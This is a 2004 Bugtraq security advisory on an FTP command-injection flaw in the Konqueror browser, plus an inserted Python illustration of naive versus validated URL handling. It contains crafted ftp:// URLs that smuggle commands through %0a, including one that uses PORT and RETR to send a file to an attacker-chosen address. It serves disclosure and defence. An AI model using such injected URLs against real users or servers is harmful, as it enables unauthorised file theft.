[37616] in bugtraq


7a69Adv#16 - Konqueror FTP command injection

daemon@ATHENA.MIT.EDU (Albert Puigsech Galicia)
Tue Dec 7 17:19:01 2004

From: Albert Puigsech Galicia <ripe@7a69ezine.org>
Reply-To: ripe@7a69ezine.org
To: bugtraq@securityfocus.com
Date: Sun, 5 Dec 2004 10:11:50 +0100
Message-Id: <200412051011.54045.ripe@7a69ezine.org>

- ------------------------------------------------------------------
       7a69ezine Advisories                      7a69Adv#16
- ------------------------------------------------------------------
  http://www.7a69ezine.org                            [05/12/2004]
- ------------------------------------------------------------------

Title:        Konqueror FTP command injection

Author:       Albert Puigsech Galicia - <ripe@7a69ezine.org>

Software:     Konqueror browser

Versions:     >= 3.3.1

Remote:       yes

Exploit:      yes

Severity:     Low-Medium

- ------------------------------------------------------------------



I. Introduction.

 Konqueror is a very versatile HTTP browser included in the KDE base package.
Like other browsers it supports additional protocols, for example FTP. This
application is commonly used to navigate filesystems.


II. Description.

 To access an FTP server using Internet Explorer you type
"ftp://ftpuser:ftppass@server/directory" in the address bar; the browser then
connects to the server and executes the following commands (others are
omitted because they are not relevant here).

   USER ftpuser
   PASS ftppass
   CWD /directory/

 The security problem is that FTP commands can be injected through the URL
by appending %0a followed by the injected commands. If you open
"ftp://ftpuser:ftppass@server/directory%0asomecommand%0a", the following
commands are executed:

   USER ftpuser
   PASS ftppass
   CWD /directory
   somecommand

 The last line sent is an erroneous command, but that does not matter because
'somecommand' has already been executed.
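 As an added illustration of the mechanism described above (this is example code, not the advisory's or Konqueror's), the following Python models a client that percent-decodes the URL and splices the fields into FTP command lines, shows how a line-oriented server then reads the decoded %0a as a command separator, and contrasts it with a builder that rejects control characters before anything reaches the control connection. The URL handling, field names and server model are assumptions for the example.

```python
import re
from urllib.parse import urlsplit, unquote

# Any ASCII control character (CR, LF, NUL, ...) in a decoded URL field.
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")

def ftp_wire_naive(url: str) -> str:
    """Model of the flawed behaviour in the advisory (not Konqueror's code):
    percent-decode the URL and splice the fields into command lines unchecked."""
    p = urlsplit(url)
    user = unquote(p.username or "anonymous")
    password = unquote(p.password or "")
    path = unquote(p.path or "/")
    return f"USER {user}\r\nPASS {password}\r\nCWD {path}\r\n"

def server_view(wire: str) -> list[str]:
    """How a line-oriented FTP server reads the control connection: one command
    per line, tolerating a bare LF as a terminator, empty lines ignored."""
    return [line for line in re.split(r"\r?\n", wire) if line]

def ftp_wire_checked(url: str) -> str:
    """Hardened builder: validate each field after percent-decoding, because
    that is where an encoded %0a turns back into a real line break."""
    p = urlsplit(url)
    fields = {
        "username": unquote(p.username or "anonymous"),
        "password": unquote(p.password or ""),
        "path": unquote(p.path or "/"),
    }
    for name, value in fields.items():
        if CONTROL_CHARS.search(value):
            raise ValueError(f"control character in URL {name}; refusing to connect")
    return (f"USER {fields['username']}\r\nPASS {fields['password']}\r\n"
            f"CWD {fields['path']}\r\n")

def is_rejected(url: str) -> bool:
    """True when the hardened builder refuses the URL."""
    try:
        ftp_wire_checked(url)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    # Constructed URLs: the advisory's benign form and its %0a-injected form.
    benign = "ftp://ftpuser:ftppass@server/directory"
    injected = "ftp://ftpuser:ftppass@server/directory%0asomecommand%0a"
    print(server_view(ftp_wire_naive(benign)))    # 3 commands
    print(server_view(ftp_wire_naive(injected)))  # 4 commands: 'somecommand' is sent
    print(is_rejected(injected))                  # True
```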


III. Exploit

 You need to trick a user into visiting your URL and then entering a valid
username and password, so exploitation also requires social engineering. With
this bug you can do many things, such as creating or deleting files and
directories, but probably the most interesting is downloading files. That is
possible with this URL:

    ftp://server/%0aPORT%20a,b,c,d,e,f%0aRETR%20/file

 The server will then connect to a.b.c.d on port e,f (see the FTP RFC for how
to translate the port number) and send the file data.


IV. Patch

 Konqueror developers have been contacted, and a patch will be available soon.


V. Timeline

01/12/2004  -  Bug discovered
02/12/2004  -  KDE developers contacted
03/12/2004  -  Fast developers reply
03/12/2004  -  IE also affected, so we decided to publish the bug
05/12/2004  -  Advisory released



VI. Extra data

 You can find more 7a69ezine advisories at the following link:

    http://www.7a69ezine.org/avisos/propios [Spanish info]

